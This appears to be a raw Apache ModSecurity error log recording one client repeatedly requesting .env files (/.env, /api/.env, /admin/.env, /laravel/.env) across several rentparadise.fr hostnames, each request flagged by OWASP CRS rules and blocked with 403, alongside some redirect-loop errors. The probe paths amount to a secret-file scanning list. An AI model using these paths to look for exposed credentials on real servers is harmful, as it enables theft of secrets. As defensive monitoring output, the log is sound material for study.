[Mon May 11 13:32:11.872007 2026] [security2:error] [pid 1319886:tid 1319913] [client 213.209.159.223:43716] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/.env"] [unique_id "agG-O6y-5-wpj6Sx56Z0VwAAAAk"]
[Mon May 11 13:32:11.872304 2026] [security2:error] [pid 1319886:tid 1319913] [client 213.209.159.223:43716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/.env"] [unique_id "agG-O6y-5-wpj6Sx56Z0VwAAAAk"]
[Mon May 11 13:32:11.874762 2026] [core:error] [pid 1319886:tid 1319913] [client 213.209.159.223:43716] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:32:11.875811 2026] [security2:error] [pid 1319886:tid 1319913] [client 213.209.159.223:43716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-O6y-5-wpj6Sx56Z0VwAAAAk"]
[Mon May 11 13:32:11.945109 2026] [security2:error] [pid 1319998:tid 1320004] [client 213.209.159.223:43722] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-O6t2WtvoFr7xvGywvQAAAIQ"]
[Mon May 11 13:32:11.945354 2026] [security2:error] [pid 1319998:tid 1320004] [client 213.209.159.223:43722] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-O6t2WtvoFr7xvGywvQAAAIQ"]
[Mon May 11 13:32:11.947955 2026] [core:error] [pid 1319998:tid 1320004] [client 213.209.159.223:43722] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:32:11.949466 2026] [security2:error] [pid 1319998:tid 1320004] [client 213.209.159.223:43722] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-O6t2WtvoFr7xvGywvQAAAIQ"]
[Mon May 11 13:32:12.020525 2026] [security2:error] [pid 1319885:tid 1319918] [client 213.209.159.223:43738] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-PFchVQ3tCn0m9Ooz-wAAARA"]
[Mon May 11 13:32:12.020821 2026] [security2:error] [pid 1319885:tid 1319918] [client 213.209.159.223:43738] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-PFchVQ3tCn0m9Ooz-wAAARA"]
[Mon May 11 13:32:12.025966 2026] [core:error] [pid 1319885:tid 1319918] [client 213.209.159.223:43738] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:32:12.027232 2026] [security2:error] [pid 1319885:tid 1319918] [client 213.209.159.223:43738] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-PFchVQ3tCn0m9Ooz-wAAARA"]
[Mon May 11 13:32:12.097575 2026] [core:error] [pid 1320398:tid 1320420] [client 213.209.159.223:43746] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:32:12.097599 2026] [core:error] [pid 1320398:tid 1320420] [client 213.209.159.223:43746] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:32:12.171869 2026] [security2:error] [pid 1319953:tid 1319969] [client 213.209.159.223:43750] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-POSQ-m-m0ukSShtdhwAAAU4"]
[Mon May 11 13:32:12.172334 2026] [security2:error] [pid 1319953:tid 1319969] [client 213.209.159.223:43750] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-POSQ-m-m0ukSShtdhwAAAU4"]
[Mon May 11 13:32:12.173717 2026] [core:error] [pid 1319953:tid 1319969] [client 213.209.159.223:43750] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:32:12.175755 2026] [security2:error] [pid 1319953:tid 1319969] [client 213.209.159.223:43750] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-POSQ-m-m0ukSShtdhwAAAU4"]
[Mon May 11 13:32:12.246423 2026] [core:error] [pid 1320674:tid 1320708] [client 213.209.159.223:43760] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:32:12.246454 2026] [core:error] [pid 1320674:tid 1320708] [client 213.209.159.223:43760] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:32:12.290445 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env"] [unique_id "agG-POSQ-m-m0ukSShtdiAAAAUs"]
[Mon May 11 13:32:12.290671 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env"] [unique_id "agG-POSQ-m-m0ukSShtdiAAAAUs"]
[Mon May 11 13:32:12.290868 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdiAAAAUs"]
[Mon May 11 13:32:12.300847 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0WAAAAAA"]
[Mon May 11 13:32:12.302997 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0WAAAAAA"]
[Mon May 11 13:32:12.303520 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0WAAAAAA"]
[Mon May 11 13:32:12.305220 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/.env"] [unique_id "agG-POJEyNRN152ArORlkQAAAEM"]
[Mon May 11 13:32:12.305391 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/.env"] [unique_id "agG-POJEyNRN152ArORlkQAAAEM"]
[Mon May 11 13:32:12.305824 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlkQAAAEM"]
[Mon May 11 13:32:12.313284 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-POSQ-m-m0ukSShtdigAAAUs"]
[Mon May 11 13:32:12.313494 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-POSQ-m-m0ukSShtdigAAAUs"]
[Mon May 11 13:32:12.313697 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdigAAAUs"]
[Mon May 11 13:32:12.320500 2026] [security2:error] [pid 1320674:tid 1320699] [client 213.209.159.223:43770] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vUwAAAMk"]
[Mon May 11 13:32:12.320809 2026] [security2:error] [pid 1320674:tid 1320699] [client 213.209.159.223:43770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vUwAAAMk"]
[Mon May 11 13:32:12.321247 2026] [core:error] [pid 1320674:tid 1320699] [client 213.209.159.223:43770] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:32:12.321745 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vVAAAAMg"]
[Mon May 11 13:32:12.321804 2026] [security2:error] [pid 1320674:tid 1320699] [client 213.209.159.223:43770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-PKO9RdIr1DwxYR1vUwAAAMk"]
[Mon May 11 13:32:12.321951 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vVAAAAMg"]
[Mon May 11 13:32:12.322596 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vVAAAAMg"]
[Mon May 11 13:32:12.326741 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0WgAAAAA"]
[Mon May 11 13:32:12.326980 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0WgAAAAA"]
[Mon May 11 13:32:12.327183 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0WgAAAAA"]
[Mon May 11 13:32:12.330204 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-POJEyNRN152ArORlkwAAAEM"]
[Mon May 11 13:32:12.330361 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-POJEyNRN152ArORlkwAAAEM"]
[Mon May 11 13:32:12.330549 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlkwAAAEM"]
